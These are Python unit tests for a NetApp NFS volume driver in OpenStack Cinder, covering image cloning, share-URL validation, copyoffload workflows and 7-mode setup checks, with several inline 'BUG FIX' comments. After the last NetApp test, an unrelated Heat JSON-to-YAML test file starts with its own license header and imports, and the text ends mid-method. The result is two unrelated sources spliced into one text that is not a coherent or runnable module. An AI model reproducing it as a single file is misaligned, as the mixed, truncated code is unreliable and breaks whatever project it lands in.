        drv._do_clone_rel_img_cache('file_name', 'vol', 'share', 'file_name')
        drv._post_clone_image(volume)

        mox.ReplayAll()
        drv.clone_image(volume, ('image_location', None), 'image_id', {})
        mox.VerifyAll()

    def get_img_info(self, format):
        """Return a minimal qemu-img-info stand-in reporting *format*."""
        class img_info(object):
            def __init__(self, fmt):
                self.file_format = fmt

        return img_info(format)

    def test_clone_image_cloneableshare_nospace(self):
        """Cloning fails gracefully when the share cannot fit the volume."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(False)

        mox.ReplayAll()
        (prop, cloned) = drv.clone_image(
            volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        if not cloned and not prop['provider_location']:
            pass
        else:
            self.fail('Expected not cloned, got cloned.')

    def test_clone_image_cloneableshare_raw(self):
        """A raw image on a cloneable share is cloned without conversion."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('raw'))
        drv._clone_volume(
            'img-id', 'vol', share='127.0.0.1:/share', volume_id=None)
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file({'name': 'vol'}, IgnoreArg())

        mox.ReplayAll()
        drv.clone_image(
            volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
        mox.VerifyAll()

    def test_clone_image_cloneableshare_notraw(self):
        """A non-raw image is converted to raw before registering in cache."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file({'name': 'vol'}, IgnoreArg())

        mox.ReplayAll()
        drv.clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()

    def test_clone_image_file_not_discovered(self):
        """If the cloned file never appears, the clone is rolled back."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(os.path, 'exists')
        mox.StubOutWithMock(drv, '_delete_file')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(False)
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        os.path.exists('/mnt/vol').AndReturn(True)
        drv._delete_file('/mnt/vol')

        mox.ReplayAll()
        vol_dict, result = drv.clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        self.assertFalse(result)
        self.assertFalse(vol_dict['bootable'])
        self.assertIsNone(vol_dict['provider_location'])

    def test_clone_image_resizefails(self):
        """If resizing the cloned file fails, the clone is rolled back."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(os.path, 'exists')
        mox.StubOutWithMock(drv, '_delete_file')

        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file(
            IgnoreArg(), IgnoreArg()).AndRaise(exception.InvalidResults())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        os.path.exists('/mnt/vol').AndReturn(True)
        drv._delete_file('/mnt/vol')

        mox.ReplayAll()
        vol_dict, result = drv.clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        self.assertFalse(result)
        self.assertFalse(vol_dict['bootable'])
        self.assertIsNone(vol_dict['provider_location'])

    def test_is_cloneable_share_badformats(self):
        """Malformed image URLs must never be treated as cloneable shares."""
        drv = self._driver
        # BUG FIX: a missing comma previously concatenated the :8080 entry
        # with the following URL, so 'nfs://com.netapp.com//img' was never
        # tested on its own.
        strgs = ['10.61.666.22:/share/img',
                 'nfs://10.61.666.22:/share/img',
                 'nfs://10.61.666.22//share/img',
                 'nfs://com.netapp.com:/share/img',
                 'nfs://com.netapp.com//share/img',
                 'com.netapp.com://share/im\\g',
                 'http://com.netapp.com://share/img',
                 'nfs://com.netapp.com:/share/img',
                 'nfs://com.netapp.com:8080//share/img',
                 'nfs://com.netapp.com//img',
                 'nfs://[ae::sr::ty::po]/img']
        for strg in strgs:
            res = drv._is_cloneable_share(strg)
            if res:
                msg = 'Invalid format matched for url %s.' % strg
                self.fail(msg)

    def test_is_cloneable_share_goodformat1(self):
        """nfs://host/share/img with an IP host is cloneable."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://10.61.222.333/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat2(self):
        """nfs://host:port/share/img with an IP host is cloneable."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://10.61.222.333:8080/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat3(self):
        """nfs://hostname:port/share/img is cloneable."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://com.netapp:8080/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat4(self):
        """nfs://hostname/share/img is cloneable."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://netapp.com/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat5(self):
        """nfs://hostname/img (no share path) is cloneable."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://netapp.com/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_check_share_in_use_no_conn(self):
        """A missing connection yields no share."""
        drv = self._driver
        share = drv._check_share_in_use(None, '/dir')
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_invalid_conn(self):
        """A connection string without a host yields no share."""
        drv = self._driver
        share = drv._check_share_in_use(':8989', '/dir')
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_incorrect_host(self):
        """An unresolvable host yields no share."""
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(utils, 'resolve_hostname')
        utils.resolve_hostname(IgnoreArg()).AndRaise(Exception())
        mox.ReplayAll()
        share = drv._check_share_in_use('incorrect:8989', '/dir')
        mox.VerifyAll()
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_success(self):
        """A resolvable host matching a mounted share is detected."""
        drv = self._driver
        mox = self.mox
        drv._mounted_shares = ['127.0.0.1:/dir/share']
        mox.StubOutWithMock(utils, 'resolve_hostname')
        mox.StubOutWithMock(drv, '_share_match_for_ip')
        utils.resolve_hostname(IgnoreArg()).AndReturn('10.22.33.44')
        drv._share_match_for_ip(
            '10.22.33.44', ['127.0.0.1:/dir/share']).AndReturn('share')
        mox.ReplayAll()
        share = drv._check_share_in_use('127.0.0.1:8989', '/dir/share')
        mox.VerifyAll()
        if not share:
            self.fail('Expected share not detected')

    def test_construct_image_url_loc(self):
        """The NFS URL is built from glance location metadata."""
        drv = self._driver
        img_loc = (None,
                   [{'metadata':
                     {'share_location': 'nfs://host/path',
                      'mount_point': '/opt/stack/data/glance',
                      'type': 'nfs'},
                     'url': 'file:///opt/stack/data/glance/image-id'}])
        location = drv._construct_image_nfs_url(img_loc)
        if location != "nfs://host/path/image-id":
            self.fail("Unexpected direct url.")

    def test_construct_image_url_direct(self):
        """A direct NFS URL is passed through unchanged."""
        drv = self._driver
        img_loc = ("nfs://host/path/image-id", None)
        location = drv._construct_image_nfs_url(img_loc)
        if location != "nfs://host/path/image-id":
            self.fail("Unexpected direct url.")


class NetappDirectCmodeNfsDriverOnlyTestCase(test.TestCase):
    """Test direct NetApp C Mode driver only and not inherit."""

    def setUp(self):
        super(NetappDirectCmodeNfsDriverOnlyTestCase, self).setUp()
        self._custom_setup()

    def _custom_setup(self):
        """Build a proxy-mode cDOT NFS driver with copyoffload configured."""
        kwargs = {}
        kwargs['netapp_mode'] = 'proxy'
        kwargs['configuration'] = create_configuration()
        self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)
        self._driver.ssc_enabled = True
        self._driver.configuration.netapp_copyoffload_tool_path = 'cof_path'

    @mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
    def test_create_volume(self, mock_volume_extra_specs):
        """create_volume picks a share and reports it as provider_location."""
        drv = self._driver
        drv.ssc_enabled = False
        extra_specs = {}
        mock_volume_extra_specs.return_value = extra_specs
        fake_share = 'localhost:myshare'
        with mock.patch.object(drv, '_ensure_shares_mounted'):
            with mock.patch.object(drv, '_find_shares',
                                   return_value=['localhost:myshare']):
                with mock.patch.object(drv, '_do_create_volume'):
                    volume_info = self._driver.create_volume(FakeVolume(1))
                    self.assertEqual(volume_info.get('provider_location'),
                                     fake_share)

    @mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
    def test_create_volume_with_qos_policy(self, mock_volume_extra_specs):
        """A netapp:qos_policy_group extra-spec is applied to the volume."""
        drv = self._driver
        drv.ssc_enabled = False
        extra_specs = {'netapp:qos_policy_group': 'qos_policy_1'}
        fake_volume = FakeVolume(1)
        fake_share = 'localhost:myshare'
        fake_qos_policy = 'qos_policy_1'
        mock_volume_extra_specs.return_value = extra_specs

        with mock.patch.object(drv, '_ensure_shares_mounted'):
            with mock.patch.object(drv, '_find_shares',
                                   return_value=['localhost:myshare']):
                with mock.patch.object(drv, '_do_create_volume'):
                    with mock.patch.object(drv,
                                           '_set_qos_policy_group_on_volume'
                                           ) as mock_set_qos:
                        volume_info = self._driver.create_volume(fake_volume)
                        self.assertEqual(volume_info.get('provider_location'),
                                         'localhost:myshare')
                        mock_set_qos.assert_called_once_with(fake_volume,
                                                             fake_share,
                                                             fake_qos_policy)

    def test_copy_img_to_vol_copyoffload_success(self):
        """With API >= 1.20, copy_image_to_volume uses the copyoffload path."""
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._try_copyoffload = mock.Mock()
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._get_vol_for_share = mock.Mock(return_value='vol')
        drv._update_stale_vols = mock.Mock()

        drv.copy_image_to_volume(context, volume, image_service, image_id)
        drv._try_copyoffload.assert_called_once_with(context, volume,
                                                     image_service,
                                                     image_id)
        drv._update_stale_vols.assert_called_once_with('vol')

    def test_copy_img_to_vol_copyoffload_failure(self):
        """A copyoffload failure falls back to the base-class copy path."""
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._try_copyoffload = mock.Mock(side_effect=Exception())
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._get_vol_for_share = mock.Mock(return_value='vol')
        drv._update_stale_vols = mock.Mock()

        # Patch the base-class method with a context manager so the
        # original is restored afterwards; the previous direct attribute
        # assignment leaked the mock into every subsequent test.
        with mock.patch.object(netapp_nfs.NetAppNFSDriver,
                               'copy_image_to_volume') as mock_base_copy:
            drv.copy_image_to_volume(context, volume, image_service, image_id)
            drv._try_copyoffload.assert_called_once_with(context, volume,
                                                         image_service,
                                                         image_id)
            mock_base_copy.assert_called_once_with(context, volume,
                                                   image_service, image_id)
        drv._update_stale_vols.assert_called_once_with('vol')

    def test_copy_img_to_vol_copyoffload_nonexistent_binary_path(self):
        """An OSError from the copyoffload binary must propagate unchanged."""
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = mock.Mock()
        image_service.get_location.return_value = (mock.Mock(), mock.Mock())
        image_service.show.return_value = {'size': 0}
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._find_image_in_cache = mock.Mock(return_value=[])
        drv._construct_image_nfs_url = mock.Mock(return_value="")
        drv._check_get_nfs_path_segs = mock.Mock(return_value=("test:test",
                                                               "dr"))
        drv._get_ip_verify_on_cluster = mock.Mock(return_value="192.1268.1.1")
        drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
        drv._get_host_ip = mock.Mock()
        drv._get_provider_location = mock.Mock()
        drv._get_export_path = mock.Mock(return_value="dr")
        drv._check_share_can_hold_size = mock.Mock()
        # Raise error as if the copyoffload file can not be found
        drv._clone_file_dst_exists = mock.Mock(side_effect=OSError())

        # Verify the original error is propagated
        self.assertRaises(OSError, drv._try_copyoffload,
                          context, volume, image_service, image_id)

    def test_copyoffload_frm_cache_success(self):
        """When the image is cached, _try_copyoffload copies from cache."""
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._find_image_in_cache = mock.Mock(return_value=[('share', 'img')])
        drv._copy_from_cache = mock.Mock(return_value=True)

        drv._try_copyoffload(context, volume, image_service, image_id)
        drv._copy_from_cache.assert_called_once_with(volume,
                                                     image_id,
                                                     [('share', 'img')])

    def test_copyoffload_frm_img_service_success(self):
        """With an empty cache, _try_copyoffload copies from the service."""
        drv = self._driver
        context = object()
        volume = {'id': 'vol_id', 'name': 'name'}
        image_service = object()
        image_id = 'image_id'
        drv._client = mock.Mock()
        drv._client.get_api_version = mock.Mock(return_value=(1, 20))
        drv._find_image_in_cache = mock.Mock(return_value=[])
        drv._copy_from_img_service = mock.Mock()

        drv._try_copyoffload(context, volume, image_service, image_id)
        drv._copy_from_img_service.assert_called_once_with(context,
                                                           volume,
                                                           image_service,
                                                           image_id)

    def test_cache_copyoffload_workflow_success(self):
        """Cache hit: the copyoffload tool is invoked with cache paths."""
        drv = self._driver
        volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
        image_id = 'image_id'
        cache_result = [('ip1:/openstack', 'img-cache-imgid')]
        drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
        drv._get_host_ip = mock.Mock(return_value='ip2')
        drv._get_export_path = mock.Mock(return_value='/exp_path')
        drv._execute = mock.Mock()
        drv._register_image_in_cache = mock.Mock()
        drv._get_provider_location = mock.Mock(return_value='/share')
        drv._post_clone_image = mock.Mock()

        copied = drv._copy_from_cache(volume, image_id, cache_result)
        self.assertTrue(copied)
        drv._get_ip_verify_on_cluster.assert_any_call('ip1')
        drv._get_export_path.assert_called_with('vol_id')
        drv._execute.assert_called_once_with('cof_path', 'ip1', 'ip1',
                                             '/openstack/img-cache-imgid',
                                             '/exp_path/name',
                                             run_as_root=False,
                                             check_exit_code=0)
        drv._post_clone_image.assert_called_with(volume)
        drv._get_provider_location.assert_called_with('vol_id')

    @mock.patch.object(image_utils, 'qemu_img_info')
    def test_img_service_raw_copyoffload_workflow_success(self,
                                                          mock_qemu_img_info):
        """Raw image from the image service: a single copyoffload execute."""
        drv = self._driver
        volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
        image_id = 'image_id'
        context = object()
        image_service = mock.Mock()
        image_service.get_location.return_value = ('nfs://ip1/openstack/img',
                                                   None)
        image_service.show.return_value = {'size': 1,
                                           'disk_format': 'raw'}

        drv._check_get_nfs_path_segs = mock.Mock(return_value=
                                                 ('ip1', '/openstack'))
        drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
        drv._get_host_ip = mock.Mock(return_value='ip2')
        drv._get_export_path = mock.Mock(return_value='/exp_path')
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._execute = mock.Mock()
        drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
        drv._discover_file_till_timeout = mock.Mock(return_value=True)
        img_inf = mock.Mock()
        img_inf.file_format = 'raw'
        mock_qemu_img_info.return_value = img_inf
        drv._check_share_can_hold_size = mock.Mock()
        drv._move_nfs_file = mock.Mock(return_value=True)
        drv._delete_file = mock.Mock()
        drv._clone_file_dst_exists = mock.Mock()
        drv._post_clone_image = mock.Mock()

        drv._copy_from_img_service(context, volume, image_service, image_id)
        drv._get_ip_verify_on_cluster.assert_any_call('ip1')
        drv._get_export_path.assert_called_with('vol_id')
        drv._check_share_can_hold_size.assert_called_with('share', 1)

        # self.assertEqual instead of a bare assert: bare asserts are
        # silently stripped when Python runs with -O.
        self.assertEqual(1, drv._execute.call_count)
        drv._post_clone_image.assert_called_with(volume)

    @mock.patch.object(image_utils, 'convert_image')
    @mock.patch.object(image_utils, 'qemu_img_info')
    @mock.patch('os.path.exists')
    def test_img_service_qcow2_copyoffload_workflow_success(self, mock_exists,
                                                            mock_qemu_img_info,
                                                            mock_cvrt_image):
        """qcow2 image: converted to raw, then copied via copyoffload."""
        drv = self._driver
        volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
        image_id = 'image_id'
        context = object()
        image_service = mock.Mock()
        image_service.get_location.return_value = ('nfs://ip1/openstack/img',
                                                   None)
        image_service.show.return_value = {'size': 1,
                                           'disk_format': 'qcow2'}
        drv._check_get_nfs_path_segs = mock.Mock(return_value=
                                                 ('ip1', '/openstack'))

        drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
        drv._get_host_ip = mock.Mock(return_value='ip2')
        drv._get_export_path = mock.Mock(return_value='/exp_path')
        drv._get_provider_location = mock.Mock(return_value='share')
        drv._execute = mock.Mock()
        drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
        img_inf = mock.Mock()
        img_inf.file_format = 'raw'
        mock_qemu_img_info.return_value = img_inf
        drv._check_share_can_hold_size = mock.Mock()

        drv._move_nfs_file = mock.Mock(return_value=True)
        drv._delete_file = mock.Mock()
        drv._clone_file_dst_exists = mock.Mock()
        drv._post_clone_image = mock.Mock()

        drv._copy_from_img_service(context, volume, image_service, image_id)
        drv._get_ip_verify_on_cluster.assert_any_call('ip1')
        drv._get_export_path.assert_called_with('vol_id')
        drv._check_share_can_hold_size.assert_called_with('share', 1)
        # self.assertEqual instead of bare asserts (stripped under -O).
        self.assertEqual(1, mock_cvrt_image.call_count)
        self.assertEqual(1, drv._execute.call_count)
        self.assertEqual(2, drv._delete_file.call_count)
        # BUG FIX: this line was previously a bare comparison expression
        # (`... .call_count == 1`) that evaluated and discarded its
        # result, so the check never ran.
        self.assertEqual(1, drv._clone_file_dst_exists.call_count)
        drv._post_clone_image.assert_called_with(volume)


class NetappDirect7modeNfsDriverTestCase(NetappDirectCmodeNfsDriverTestCase):
    """Test direct NetApp 7-mode NFS driver.

    Inherits the cDOT test cases but swaps in the 7-mode driver via
    _custom_setup.  (The original docstring said "C Mode"; this class
    exercises NetAppDirect7modeNfsDriver.)
    """
    def _custom_setup(self):
        # Override the parent setup: build the 7-mode driver variant.
        self._driver = netapp_nfs.NetAppDirect7modeNfsDriver(
            configuration=create_configuration())

    def _prepare_delete_snapshot_mock(self, snapshot_exists):
        """Record mox expectations for a snapshot delete.

        When ``snapshot_exists`` is true, the driver is additionally
        expected to resolve the volume path and shell out to ``rm``.
        Returns the mox instance already in replay mode.
        """
        drv = self._driver
        mox = self.mox

        mox.StubOutWithMock(drv, '_get_provider_location')
        mox.StubOutWithMock(drv, '_volume_not_present')

        if snapshot_exists:
            mox.StubOutWithMock(drv, '_execute')
            mox.StubOutWithMock(drv, '_get_volume_path')

        drv._get_provider_location(IgnoreArg())
        # _volume_not_present returns True when the snapshot is absent,
        # hence the negation of snapshot_exists.
        drv._volume_not_present(IgnoreArg(), IgnoreArg())\
            .AndReturn(not snapshot_exists)

        if snapshot_exists:
            drv._get_volume_path(IgnoreArg(), IgnoreArg())
            drv._execute('rm', None, run_as_root=True)

        mox.ReplayAll()

        return mox

    def test_check_for_setup_error_version(self):
        """Setup must fail when the API version is missing or too old."""
        drv = self._driver
        drv._client = api.NaServer("127.0.0.1")

        # check exception raises when version not found
        self.assertRaises(exception.VolumeBackendAPIException,
                          drv.check_for_setup_error)

        drv._client.set_api_version(1, 8)

        # check exception raises when not supported version
        self.assertRaises(exception.VolumeBackendAPIException,
                          drv.check_for_setup_error)

    def test_check_for_setup_error(self):
        """Setup fails with unset flags and succeeds once they are set."""
        mox = self.mox
        drv = self._driver
        drv._client = api.NaServer("127.0.0.1")
        drv._client.set_api_version(1, 9)
        required_flags = [
            'netapp_transport_type',
            'netapp_login',
            'netapp_password',
            'netapp_server_hostname',
            'netapp_server_port']

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, None)
        # check exception raises when flags are not set
        self.assertRaises(exception.CinderException,
                          drv.check_for_setup_error)

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, 'val')

        mox.ReplayAll()

        drv.check_for_setup_error()

        mox.VerifyAll()

        # restore initial FLAGS
        for flag in required_flags:
            delattr(drv.configuration, flag)

    def test_do_setup(self):
        """do_setup delegates to the base class, then custom setup."""
        mox = self.mox
        drv = self._driver
        mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
        mox.StubOutWithMock(drv, '_get_client')
        mox.StubOutWithMock(drv, '_do_custom_setup')
        netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
        drv._get_client()
        drv._do_custom_setup(IgnoreArg())

        mox.ReplayAll()

        drv.do_setup(IsA(context.RequestContext))

        mox.VerifyAll()

    def _prepare_clone_mock(self, status):
        """Record mox expectations for a clone operation.

        ``status == 'fail'`` records the clone-wait raising NaApiError
        followed by a _clear_clone cleanup; any other value records a
        successful wait.  Returns the mox instance (not yet replayed).
        """
        drv = self._driver
        mox = self.mox

        volume = FakeVolume()
        setattr(volume, 'provider_location', '127.0.0.1:/nfs')

        mox.StubOutWithMock(drv, '_get_export_ip_path')
        mox.StubOutWithMock(drv, '_get_actual_path_for_export')
        mox.StubOutWithMock(drv, '_start_clone')
        mox.StubOutWithMock(drv, '_wait_for_clone_finish')
        if status == 'fail':
            mox.StubOutWithMock(drv, '_clear_clone')

        drv._get_export_ip_path(
            IgnoreArg(), IgnoreArg()).AndReturn(('127.0.0.1', '/nfs'))
        drv._get_actual_path_for_export(IgnoreArg()).AndReturn('/vol/vol1/nfs')
        drv._start_clone(IgnoreArg(), IgnoreArg()).AndReturn(('1', '2'))
        if status == 'fail':
            drv._wait_for_clone_finish('1', '2').AndRaise(
                api.NaApiError('error', 'error'))
            drv._clear_clone('1')
        else:
            drv._wait_for_clone_finish('1', '2')
        return mox

    def test_clone_volume_clear(self):
        """A failed clone triggers _clear_clone; NaApiError is tolerated."""
        drv = self._driver
        mox = self._prepare_clone_mock('fail')

        mox.ReplayAll()

        volume_name = 'volume_name'
        clone_name = 'clone_name'
        volume_id = volume_name + str(hash(volume_name))
        try:
            drv._clone_volume(volume_name, clone_name, volume_id)
        except Exception as e:
            # NaApiError is the expected failure injected by the mock;
            # anything else is a genuine test failure.
            if isinstance(e, api.NaApiError):
                pass
            else:
                raise

        mox.VerifyAll()

#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import os

import mock
import six
import yaml

from heat.common import config
from heat.common import exception
from heat.common import template_format
from heat.tests.common import HeatTestCase
from heat.tests import utils


class JsonToYamlTest(HeatTestCase):
    """Verify bundled JSON templates convert cleanly to equivalent YAML."""

    def setUp(self):
        super(JsonToYamlTest, self).setUp()
        # Require at least this many template files to be exercised.
        self.expected_test_count = 2
        self.longMessage = True
        self.maxDiff = None

    def test_convert_all_templates(self):
        """Convert sample templates and compare the JSON vs YAML parses."""
        path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                            'templates')

        template_test_count = 0
        for (json_str,
             yml_str,
             file_name) in self.convert_all_json_to_yaml(path):

            self.compare_json_vs_yaml(json_str, yml_str, file_name)
